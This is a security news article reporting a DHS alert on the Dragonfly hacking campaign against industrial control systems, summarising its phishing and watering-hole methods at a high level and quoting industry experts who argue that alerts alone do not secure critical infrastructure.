This content is part of the Essential Guide: How air gap attacks challenge the notion of secure networks

DHS' Dragonfly ICS campaign alert isn't enough, experts say

The Department of Homeland Security released an alert confirming the Dragonfly ICS cyberattack campaign, but experts said more action is needed to protect critical infrastructure.

A new government warning added details about cyberattacks targeting critical control systems, but experts said the industry needs more funding and action, rather than alerts, to secure infrastructure.

The Department of Homeland Security (DHS) issued an alert Friday, stating that an advanced persistent threat group -- labeled as Dragonfly by a September report from Symantec -- has "targeted government entities and the energy, water, aviation, nuclear and critical manufacturing sectors," with specific focus on industrial control systems (ICS).

According to the DHS, the Dragonfly ICS campaign was comprised of "two distinct categories of victims: staging and intended targets."

"The initial victims are peripheral organizations such as trusted third party suppliers with less secure networks ... The threat actor uses the staging targets' networks as pivot points and malware repositories when targeting their final intended victims," DHS wrote in the alert. "The ultimate objective of the cyber threat actors is to compromise organizational networks."

Dragonfly ICS attack patterns

The alert detailed how the Dragonfly ICS campaign used multiple different attacks to steal login credentials, including:

  • spear phishing attacks using "legitimate Microsoft Office functions to retrieve a document from a remote server using the Server Message Block protocol";
  • spear phishing attacks aimed at luring targets to a website where they would be prompted to retrieve a malicious file; and
  • phishing attacks with fake login pages or malicious Microsoft Word files and watering-hole attacks.

DHS said the Dragonfly ICS campaign would make use of the stolen credentials "to access victims' networks where multi-factor authentication [was] not used" to set up persistent access.

The security mindset of watching for anomalies at the perimeter often becomes the equivalent of closing the barn door after the horses have bolted.
Satya Guptafounder and CTO for Virsec Systems

Paul Edon, director of international customer services at Tripwire, based in Portland, Ore., said the Dragonfly ICS attacks are "nothing new, but they should act to remind us that industrial control systems that were once protected by air gap and diode architecture are now becoming physical extensions to corporate and business networks."

"There is no dispute that connectivity provides many business advantages, such as centralized management and control, remote engineering access and resource consolidation," Edon told SearchSecurity. "However, it's important to remember that it also brings with it a large number of additional risks, mainly increased attack vectors, exposure of inherently insecure and sometimes obsolete IT systems, and the opportunity for attackers to exploit vulnerabilities that may have been around for a decade or more, but for various valid reasons have not been patched."

Mitigating the risks of the Dragonfly ICS campaign

The DHS alert provided IP addresses, domain names, file hashes, and YARA and Snort signatures associated with the Dragonfly ICS attacks and urged network admins to check for intrusions on their systems and block malicious sources. DHS also included a long list of ways to detect spear phishing attacks, watering holes, web shells, remote access activity and malicious persistence.

Michael Daly, CTO of cybersecurity and special missions at Raytheon, based in Waltham, Mass., applauded the Dragonfly ICS alert for "sharing important security information with the private sector about the growing threats to the nation's critical infrastructure."

"Cybersecurity is no longer just a matter of protecting stored data like credit cards. It is now the protection of the systems that run critical industries -- energy, transportation, healthcare and finance -- all the things that enable our modern way of life," Daly told SearchSecurity. "The adversaries we face are persistent and well-resourced. Their cyberattacks are changing constantly. One of their favorite techniques is installing backdoors to maintain a foothold in our systems they could use during a time of crisis."

More needs to be done

However, not all experts were as positive about the DHS warning. Satya Gupta, founder and CTO for threat protection vendor Virsec Systems, based in San Jose, Calif., said the "security recommendations are inadequate."

"The security mindset of watching for anomalies at the perimeter often becomes the equivalent of closing the barn door after the horses have bolted. Perimeters are inevitably porous, and the air gaps that many ICS systems were designed around have disappeared," Gupta told SearchSecurity. "Our security focus needs to shift from the network perimeter to the applications themselves. By closely monitoring application flows, processes and memory, you can spot unusual behavior at the source and take action faster and more surgically, before damage occurs or spreads."

Tim Erlin, vice president of product management and strategy at Tripwire, said the Dragonfly ICS alert is only one part of making infrastructure more secure.

"This public warning from the U.S. government should be taken seriously, but it's only the latest in a long series of warnings from within the cybersecurity industry," Erlin told SearchSecurity. "Experts working on cybersecurity for critical infrastructure know the risks and the stakes and are already working to address them. Warnings like this are an important aspect of information sharing, but they don't materially change funding levels, resources or skill sets by themselves."

Next Steps

Learn how to build secure IIoT networks to support critical infrastructure.

Find out how web shells are used to exploit security tools and servers.

Get info on the development of an ICS security framework.

Dig Deeper on Threats and vulnerabilities